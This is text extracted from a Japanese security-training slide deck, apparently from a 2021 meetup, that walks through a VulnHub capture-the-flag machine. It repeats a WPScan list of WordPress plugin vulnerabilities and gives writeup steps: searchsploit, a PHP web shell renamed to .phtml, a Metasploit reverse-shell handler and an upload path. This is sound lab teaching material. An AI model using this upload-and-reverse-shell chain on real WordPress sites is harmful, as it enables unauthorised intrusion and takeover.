(RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
© 2021 Ierae Security Inc. All Rights Reserved. 89 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
© 2021 Ierae Security Inc. All Rights Reserved. 90 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
© 2021 Ierae Security Inc. All Rights Reserved. 91 チャレンジ問題 [!] Title: Gwolle Guestbook <= 1.5.3 - Remote File Inclusion (RFI) [!] Title: Gwolle Guestbook <= 2.1.0 - Cross-Site Request Forgery (CSRF) [!] Title: Gwolle Guestbook <= 2.1.0 - Unauthenticated Stored Cross-Site Scripting (XSS) [!] Title: Gwolle Guestbook <= 2.5.3 - Cross-Site Scripting (XSS) [!] Title: Mail Masta 1.0 - Unauthenticated Local File Inclusion (LFI) [!] Title: Mail Masta 1.0 - Multiple SQL Injection [!] Title: Reflex Gallery <= 3.1.3 - Arbitrary File Upload [!] Title: Multiple Plugins - jQuery prettyPhoto DOM Cross-Site Scripting (XSS) [!] Title: Site Editor <= 1.1.1 - Local File Inclusion (LFI) [!] Title: Slideshow Gallery < 1.4.7 - Arbitrary File Upload [!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) [!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS) [!] Title: Slideshow Gallery <= 1.6.8 - XSS and SQLi [!] Title: EasyCart <= 3.0.15 - Unrestricted File Upload [!] Title: EasyCart 1.1.30 - 3.0.20 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 – Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE) [!] Title: WP Support Plus Responsive Ticket System < 9.0.3 - Multiple Authenticated SQL Injection [!] Title: WP Support Plus Responsive Ticket System < 9.1.2 - Stored XSS [!] Title: WP Support Plus Responsive Ticket System < 8.0.0 - Privilege Escalation [!] Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution [!] Title: WP Symposium 13.04 - Unvalidated Redirect [!] Title: WP Symposium <= 12.07.07 - Authentication Bypass [!] Title: WP Symposium <= 14.11 - Unauthenticated Shell Upload [!] Title: WP Symposium <= 15.1 - SQL Injection [!] Title: WP Symposium <= 15.5.1 - Unauthenticated SQL Injection [!] Title: WP Symposium <= 15.1 - Blind SQL Injection [!] Title: WP Symposium <= 15.8.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)  別の方法でReverse Shellを奪取しよう!
© 2021 Ierae Security Inc. All Rights Reserved. 92 チャレンジ問題のヒント  WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!  ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!  ヒント
© 2021 Ierae Security Inc. All Rights Reserved. 93 チャレンジ問題のヒント  WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!  ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!  ヒント
© 2021 Ierae Security Inc. All Rights Reserved. 94 チャレンジ問題のヒント  WPScanのReferencesやGoogle検索からExploit Codeを見つけよう!  ディレクトリ・リスティングを使って、アクセスすべきURLを特定しよう!  ヒント
© 2021 Ierae Security Inc. All Rights Reserved. 95 チャレンジ問題 Writeup チャレンジ問題 Writeup
© 2021 Ierae Security Inc. All Rights Reserved. 96 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution searchsploit WP Support Plus Responsive  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 97 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution searchsploit WP Support Plus Responsive  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 98 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution searchsploit WP Support Plus Responsive  別の方法でReverse Shellを奪取しよう!
© 2021 Ierae Security Inc. All Rights Reserved. 99 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution vim exploit.html cp shell.php shell.phtml python3 –m http.server 80  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution msf6 exploit(multi/handler) > options msf6 exploit(multi/handler) > run  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://127.0.0.1/exploit.htmlからshell.phtmlをサーバにアップロード -> http://<IP Address>/wordpress/wp-content/uploads/wpsp/shell.phtml  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://192.168.43.13/wordpress/wp-content/uploads/wpsp/  別の方法でReverse Shellを奪取しよう! URL:https://www.vulnhub.com/entry/ha-wordy,363/
© 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://192.168.43.13/wordpress/wp-content/uploads/wpsp/  別の方法でReverse Shellを奪取しよう!
© 2021 Ierae Security Inc. All Rights Reserved. 10 チャレンジ問題  Title: WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution http://192.168.43.13/wordpress/wp-content/uploads/wpsp/  別の方法でReverse Shellを奪取しよう!

Recommended

とある診断員とSQLインジェクション
とある診断員とSQLインジェクションとある診断員とSQLインジェクション
とある診断員とSQLインジェクション
zaki4649
 
とある診断員とAWS
とある診断員とAWSとある診断員とAWS
とある診断員とAWS
zaki4649
 
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
abend_cve_9999_0001
 
コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線
Motonori Shindo
 
ヤフーのプライベートクラウドとクラウドエンジニアの業務について
ヤフーのプライベートクラウドとクラウドエンジニアの業務についてヤフーのプライベートクラウドとクラウドエンジニアの業務について
ヤフーのプライベートクラウドとクラウドエンジニアの業務について
Yahoo!デベロッパーネットワーク
 
PenTesterが知っている危ないAWS環境の共通点
PenTesterが知っている危ないAWS環境の共通点 PenTesterが知っている危ないAWS環境の共通点
PenTesterが知っている危ないAWS環境の共通点
zaki4649
 
ネットワークの自動化・監視の取り組みについて #netopscoding #npstudy
ネットワークの自動化・監視の取り組みについて #netopscoding #npstudyネットワークの自動化・監視の取り組みについて #netopscoding #npstudy
ネットワークの自動化・監視の取り組みについて #netopscoding #npstudy
Yahoo!デベロッパーネットワーク
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Akihiro Suda
 

Recommended

とある診断員とSQLインジェクション
とある診断員とSQLインジェクションとある診断員とSQLインジェクション
とある診断員とSQLインジェクション
zaki4649
 
とある診断員とAWS
とある診断員とAWSとある診断員とAWS
とある診断員とAWS
zaki4649
 
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
フリーでできるセキュリティWeb編(SQLMあpを楽しもう)
abend_cve_9999_0001
 
コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線コンテナネットワーキング(CNI)最前線
コンテナネットワーキング(CNI)最前線
Motonori Shindo
 
ヤフーのプライベートクラウドとクラウドエンジニアの業務について
ヤフーのプライベートクラウドとクラウドエンジニアの業務についてヤフーのプライベートクラウドとクラウドエンジニアの業務について
ヤフーのプライベートクラウドとクラウドエンジニアの業務について
Yahoo!デベロッパーネットワーク
 
PenTesterが知っている危ないAWS環境の共通点
PenTesterが知っている危ないAWS環境の共通点 PenTesterが知っている危ないAWS環境の共通点
PenTesterが知っている危ないAWS環境の共通点
zaki4649
 
ネットワークの自動化・監視の取り組みについて #netopscoding #npstudy
ネットワークの自動化・監視の取り組みについて #netopscoding #npstudyネットワークの自動化・監視の取り組みについて #netopscoding #npstudy
ネットワークの自動化・監視の取り組みについて #netopscoding #npstudy
Yahoo!デベロッパーネットワーク
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Akihiro Suda
 
SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
 
flaws.cloudに挑戦しよう!
flaws.cloudに挑戦しよう!flaws.cloudに挑戦しよう!
flaws.cloudに挑戦しよう!
zaki4649
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
Kohei Tokunaga
 
AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)
AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)
AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)
Trainocate Japan, Ltd.
 
DockerとKubernetesをかけめぐる
DockerとKubernetesをかけめぐるDockerとKubernetesをかけめぐる
DockerとKubernetesをかけめぐる
Kohei Tokunaga
 
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
NTT DATA Technology & Innovation
 
macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~
macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~
macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~
NTT Communications Technology Development
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
Shota Shinogi
 
DevOps Overview
DevOps OverviewDevOps Overview
DevOps Overview
IIJ
 
CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料
SECCON Beginners
 
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
Katsuya Yamaguchi
 
JIRA / Confluence の 必須プラグインはこれだ
JIRA / Confluence の 必須プラグインはこれだJIRA / Confluence の 必須プラグインはこれだ
JIRA / Confluence の 必須プラグインはこれだ
Narichika Kajihara
 
Kubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャー
Kubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャーKubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャー
Kubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャー
Toru Makabe
 
XXE、SSRF、安全でないデシリアライゼーション入門
XXE、SSRF、安全でないデシリアライゼーション入門XXE、SSRF、安全でないデシリアライゼーション入門
XXE、SSRF、安全でないデシリアライゼーション入門
Hiroshi Tokumaru
 
Ansible ではじめるインフラのコード化入門
Ansible ではじめるインフラのコード化入門Ansible ではじめるインフラのコード化入門
Ansible ではじめるインフラのコード化入門
Sho A
 
Webアプリケーション負荷試験実践入門
Webアプリケーション負荷試験実践入門Webアプリケーション負荷試験実践入門
Webアプリケーション負荷試験実践入門
樽八 仲川
 
Vue.js で XSS
Vue.js で XSSVue.js で XSS
Vue.js で XSS
tobaru_yuta
 
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
NTT DATA Technology & Innovation
 
コンテナ未経験新人が学ぶコンテナ技術入門
コンテナ未経験新人が学ぶコンテナ技術入門コンテナ未経験新人が学ぶコンテナ技術入門
コンテナ未経験新人が学ぶコンテナ技術入門
Kohei Tokunaga
 
最近のやられアプリを試してみた
最近のやられアプリを試してみた最近のやられアプリを試してみた
最近のやられアプリを試してみた
zaki4649
 
Nutanix エンジニアのための Git 入門 :序
Nutanix エンジニアのための Git 入門 :序Nutanix エンジニアのための Git 入門 :序
Nutanix エンジニアのための Git 入門 :序
Wataru Unno
 
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
Hibino Hisashi
 

More Related Content

What's hot

SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
Hiroshi Tokumaru
 
DockerとKubernetesをかけめぐる
DockerとKubernetesをかけめぐるDockerとKubernetesをかけめぐる
DockerとKubernetesをかけめぐる
Kohei Tokunaga
 
DevOps Overview
DevOps OverviewDevOps Overview
DevOps Overview
IIJ
 
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
Katsuya Yamaguchi
 
コンテナ未経験新人が学ぶコンテナ技術入門
コンテナ未経験新人が学ぶコンテナ技術入門コンテナ未経験新人が学ぶコンテナ技術入門
コンテナ未経験新人が学ぶコンテナ技術入門
Kohei Tokunaga
 

What's hot (20)

SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021SPAセキュリティ入門~PHP Conference Japan 2021
SPAセキュリティ入門~PHP Conference Japan 2021
 
flaws.cloudに挑戦しよう!
flaws.cloudに挑戦しよう!flaws.cloudに挑戦しよう!
flaws.cloudに挑戦しよう!
 
Dockerからcontainerdへの移行
Dockerからcontainerdへの移行Dockerからcontainerdへの移行
Dockerからcontainerdへの移行
 
AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)
AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)
AWSとオンプレミスを繋ぐときに知っておきたいルーティングの基礎知識(CCSI監修!)
 
DockerとKubernetesをかけめぐる
DockerとKubernetesをかけめぐるDockerとKubernetesをかけめぐる
DockerとKubernetesをかけめぐる
 
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
乗っ取れコンテナ!!開発者から見たコンテナセキュリティの考え方(CloudNative Days Tokyo 2021 発表資料)
 
macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~
macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~
macOSの仮想化技術について ~Virtualization-rs Rust bindings for virtualization.framework ~
 
CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)CyberChefの使い方(HamaCTF2019 WriteUp編)
CyberChefの使い方(HamaCTF2019 WriteUp編)
 
DevOps Overview
DevOps OverviewDevOps Overview
DevOps Overview
 
CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料CTF for ビギナーズ ネットワーク講習資料
CTF for ビギナーズ ネットワーク講習資料
 
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
CSI Driverを開発し自社プライベートクラウドにより適した安全なKubernetes Secrets管理を実現した話
 
JIRA / Confluence の 必須プラグインはこれだ
JIRA / Confluence の 必須プラグインはこれだJIRA / Confluence の 必須プラグインはこれだ
JIRA / Confluence の 必須プラグインはこれだ
 
Kubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャー
Kubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャーKubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャー
Kubernetesのしくみ やさしく学ぶ 内部構造とアーキテクチャー
 
XXE、SSRF、安全でないデシリアライゼーション入門
XXE、SSRF、安全でないデシリアライゼーション入門XXE、SSRF、安全でないデシリアライゼーション入門
XXE、SSRF、安全でないデシリアライゼーション入門
 
Ansible ではじめるインフラのコード化入門
Ansible ではじめるインフラのコード化入門Ansible ではじめるインフラのコード化入門
Ansible ではじめるインフラのコード化入門
 
Webアプリケーション負荷試験実践入門
Webアプリケーション負荷試験実践入門Webアプリケーション負荷試験実践入門
Webアプリケーション負荷試験実践入門
 
Vue.js で XSS
Vue.js で XSSVue.js で XSS
Vue.js で XSS
 
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
Kubernetesでの性能解析 ~なんとなく遅いからの脱却~(Kubernetes Meetup Tokyo #33 発表資料)
 
コンテナ未経験新人が学ぶコンテナ技術入門
コンテナ未経験新人が学ぶコンテナ技術入門コンテナ未経験新人が学ぶコンテナ技術入門
コンテナ未経験新人が学ぶコンテナ技術入門
 
最近のやられアプリを試してみた
最近のやられアプリを試してみた最近のやられアプリを試してみた
最近のやられアプリを試してみた
 

Similar to イエラエセキュリティMeet up 20210820

【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
Hibino Hisashi
 
Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 VulsInternet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Kota Kanbe
 
Jenkins User Conference 東京 2015
Jenkins User Conference 東京 2015Jenkins User Conference 東京 2015
Jenkins User Conference 東京 2015
Kohsuke Kawaguchi
 

Similar to イエラエセキュリティMeet up 20210820 (20)

Nutanix エンジニアのための Git 入門 :序
Nutanix エンジニアのための Git 入門 :序Nutanix エンジニアのための Git 入門 :序
Nutanix エンジニアのための Git 入門 :序
 
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
【DeepSecurityUserNight】我が家の箱入り娘を世間に晒すのは危険なのでDeepSecurityに見守ってもらった話
 
[DockerConハイライト] OpenPubKeyによるイメージの署名と検証.pdf
[DockerConハイライト] OpenPubKeyによるイメージの署名と検証.pdf[DockerConハイライト] OpenPubKeyによるイメージの署名と検証.pdf
[DockerConハイライト] OpenPubKeyによるイメージの署名と検証.pdf
 
Cloudy会 @cloudymeeting ハイブリッドクラウドとheroku/EC2決算法
Cloudy会 @cloudymeeting ハイブリッドクラウドとheroku/EC2決算法Cloudy会 @cloudymeeting ハイブリッドクラウドとheroku/EC2決算法
Cloudy会 @cloudymeeting ハイブリッドクラウドとheroku/EC2決算法
 
Jenkins 2.0 (日本語)
Jenkins 2.0 (日本語)Jenkins 2.0 (日本語)
Jenkins 2.0 (日本語)
 
Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 VulsInternet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
Internet Week 2016 脆弱性スキャナによる対策支援の課題 Vuls
 
サーバーレスで ガチ本番運用までやってるお話し
サーバーレスで ガチ本番運用までやってるお話しサーバーレスで ガチ本番運用までやってるお話し
サーバーレスで ガチ本番運用までやってるお話し
 
Jenkins User Conference 東京 2015
Jenkins User Conference 東京 2015Jenkins User Conference 東京 2015
Jenkins User Conference 東京 2015
 
20141121 zabbix conference_japan_2014_nifty_kusakabe
20141121 zabbix conference_japan_2014_nifty_kusakabe20141121 zabbix conference_japan_2014_nifty_kusakabe
20141121 zabbix conference_japan_2014_nifty_kusakabe
 
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
Docker入門-基礎編 いまから始めるDocker管理【2nd Edition】
 
オトナのDocker入門
オトナのDocker入門オトナのDocker入門
オトナのDocker入門
 
DeNA private cloudのその後 #denatechcon
DeNA private cloudのその後 #denatechconDeNA private cloudのその後 #denatechcon
DeNA private cloudのその後 #denatechcon
 
hbstudy37 doc
hbstudy37 dochbstudy37 doc
hbstudy37 doc
 
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
はじめてのAzure Web App for Containers! -コンテナの基礎から DevOps 環境の構築まで-
 
QuickDemo HashiCorp Terraform with Microsoft Azure and VMware vSphere
QuickDemo HashiCorp Terraform with Microsoft Azure and VMware vSphereQuickDemo HashiCorp Terraform with Microsoft Azure and VMware vSphere
QuickDemo HashiCorp Terraform with Microsoft Azure and VMware vSphere
 
普通のRailsアプリをdockerで本番運用する知見
普通のRailsアプリをdockerで本番運用する知見普通のRailsアプリをdockerで本番運用する知見
普通のRailsアプリをdockerで本番運用する知見
 
Google Container Engine (GKE) & Kubernetes のアーキテクチャ解説
